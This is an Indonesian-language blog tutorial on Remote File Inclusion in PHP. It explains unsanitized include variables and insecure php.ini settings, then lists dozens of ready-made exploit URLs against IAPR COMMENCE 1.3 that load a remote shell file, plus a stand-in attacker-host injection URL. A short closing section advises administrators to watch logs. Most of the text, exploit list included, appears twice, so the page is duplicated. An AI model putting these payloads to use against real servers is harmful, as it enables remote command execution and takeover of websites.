Sekarang saia ingin brbagi ttg RFI.
Psti sdh bnyk yg mendengar dan tau apa yg disebut dgn Remote File Inclusion (RFI).
Remote File Inclusion : sebuah bentuk srangan scra remote yg memanfaatkan kelemahan script pd suatu page website krn tdk tersanitasi dgn baik, dgn cara menyisipkan script lain untuk exploitasi,
Tehnik ini sendiri mengharuskan webserver yg bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yg disisipi dibuat menggunakan bahasa script tsb. Target RFI biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yg rawan terhadap serangan RFI.
MENGAPA BISA TERJADI?
———————-
Sebuah serangan RFI terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yg tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:
1. Variabel yg tidak dideklarasikan dgn benar (unsanitized variables)
Variabel dalam PHP mempunyai sintaks:
include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)
Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:
…
include($my_ms[”root”].’/error.php’);
…
Variabel tsb memiliki kemungkinan untuk disisipi file dari luar webserver dgn eksploit
script PHP Incetion:
http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?
2. Setting dalam file PHP.ini
register_globals=On
magic_quotes=off
allow_fopenurl=on
CONTOH SERANGAN dgn MENGGUNAKAN TEKNIK RFI
———————————————
Pada kesempatan kali ini saia akan memberikan sebuah contoh penyerangan dgn menggunakan teknik Remote File Inclusion. yg saia jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yg tidak terfilter dgn baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dgn menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :
http://target.com/Commence/includes/
db_connect.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/
include_all_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/
main_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/
output_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/
user_authen_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/includes/
include_all_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
include_all_phase.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase1.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase1.php?privilege_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase2.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase2.php?privilege_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase3.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase3.php?privilege_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase4.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase4.php?privilege_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phasebase.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/page_includes/
page.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/includes/
include_all_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
include_all_phase.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase1.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase1.php?privilege_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase2.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase2.php?privilege_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase3.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase3.php?privilege_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase4.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase4.php?privilege_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phasebase.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
include_all_phase.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
phase1.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
phase2.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
phase3.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
phase4.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
phasebase.php?php_root_path=http://shell.txt
TINGKAT BAHAYA
————–
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dgn cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.
APA yg HARUS DILAKUKAN
————————-
Banyak sekali portal dan komunitas white hat yg sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yg mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yg berarti terhadap CMS yg mungkin sekarang anda gunakan. Selalu perhatikan raw log yg biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yg agak menyimpang seperti
GET /index.php?page=http://www.injek-pake-kaki.net/cmd?
anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yg anda kelola.Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha² infiltrasi dan usaha eksploitasi lokal.
Psti sdh bnyk yg mendengar dan tau apa yg disebut dgn Remote File Inclusion (RFI).
Remote File Inclusion : sebuah bentuk srangan scra remote yg memanfaatkan kelemahan script pd suatu page website krn tdk tersanitasi dgn baik, dgn cara menyisipkan script lain untuk exploitasi,
Tehnik ini sendiri mengharuskan webserver yg bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yg disisipi dibuat menggunakan bahasa script tsb. Target RFI biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yg rawan terhadap serangan RFI.
MENGAPA BISA TERJADI?
———————-
Sebuah serangan RFI terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yg tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:
1. Variabel yg tidak dideklarasikan dgn benar (unsanitized variables)
Variabel dalam PHP mempunyai sintaks:
include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)
Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:
…
include($my_ms[”root”].’/error.php’);
…
Variabel tsb memiliki kemungkinan untuk disisipi file dari luar webserver dgn eksploit
script PHP Incetion:
http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?
2. Setting dalam file PHP.ini
register_globals=On
magic_quotes=off
allow_fopenurl=on
CONTOH SERANGAN dgn MENGGUNAKAN TEKNIK RFI
———————————————
Pada kesempatan kali ini saia akan memberikan sebuah contoh penyerangan dgn menggunakan teknik Remote File Inclusion. yg saia jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yg tidak terfilter dgn baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dgn menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :
http://target.com/Commence/includes/
db_connect.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/
include_all_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/
main_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/
output_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/
user_authen_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/includes/
include_all_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
include_all_phase.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase1.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase1.php?privilege_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase2.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase2.php?privilege_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase3.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase3.php?privilege_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase4.php?php_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phase4.php?privilege_root_path=http://shell.txt
http://target.com/Commence/admin/phase/
phasebase.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/page_includes/
page.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/includes/
include_all_fns.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
include_all_phase.php?php_root_path=http://shell.txt
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase1.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase1.php?privilege_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase2.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase2.php?privilege_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase3.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase3.php?privilege_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase4.php?php_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phase4.php?privilege_root_path=http://shell.txt
http://target.com/Commence/reviewer/phase/
phasebase.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
include_all_phase.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
phase1.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
phase2.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
phase3.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
phase4.php?php_root_path=http://shell.txt
http://target.com/Commence/user/phase/
phasebase.php?php_root_path=http://shell.txt
TINGKAT BAHAYA
————–
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dgn cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.
APA yg HARUS DILAKUKAN
————————-
Banyak sekali portal dan komunitas white hat yg sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yg mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yg berarti terhadap CMS yg mungkin sekarang anda gunakan. Selalu perhatikan raw log yg biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yg agak menyimpang seperti
GET /index.php?page=http://www.injek-pake-kaki.net/cmd?
Source : http://blog.skutengboy.us/remote-file-inclusion
Label:
Tutorial
Previous Article
Responses
0 Respones to "Remote File Inclusion"
Posting Komentar